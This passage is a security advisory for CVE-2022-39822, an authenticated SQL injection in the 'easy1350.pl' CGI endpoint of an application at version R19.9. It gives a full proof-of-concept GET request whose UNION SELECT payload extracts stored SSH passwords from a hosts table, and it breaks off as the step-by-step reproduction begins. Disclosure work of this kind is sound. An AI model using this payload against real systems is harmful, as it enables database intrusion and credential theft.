Vulnerability Description: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') – CWE-89
Software Version: R19.9
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39822
CVSv3: 8.8
Severity: High
Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli
The Web Application is affected by SQL Injection vulnerability. Through the injection of arbitrary SQL statements, a potential attacker can modify query syntax and perform unauthorized (and unexpected) operations against the remote database.
Step-by-step instructions and PoC
A remote user, authenticated to the web application may manipulate the request parameters to exploit error output from the database to manipulate its data. It manipulates the database into generating an error that informs the actor of the database’s structure and afterwards extracts the data contents in the database statement. Please see the examples below for step-by-step instructions to reproduce the vulnerability.
Affected Endpoints
· URL: https://<host>/cgi-bin/R19.9/easy1350.pl?action=edit_master&session=[REDACTED]&id=1host=1
· HTTP Parameter: id, host
Below are the evidences with the vulnerability details and the payloads used.
GET /cgi-bin/R19.9/easy1350.pl?action=edit_master&session=KALEVO19&id=1'+union+SELECT+group_concat(ssh_password,'~~')+FROM+hosts+--&host=1 HTTP/1.1
Host: <host>
Cookie: XSRF=[REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Authorization: Basic [REDACTED]
Connection: close
This first step consists of changing the value parameter to obtain a SQL error:
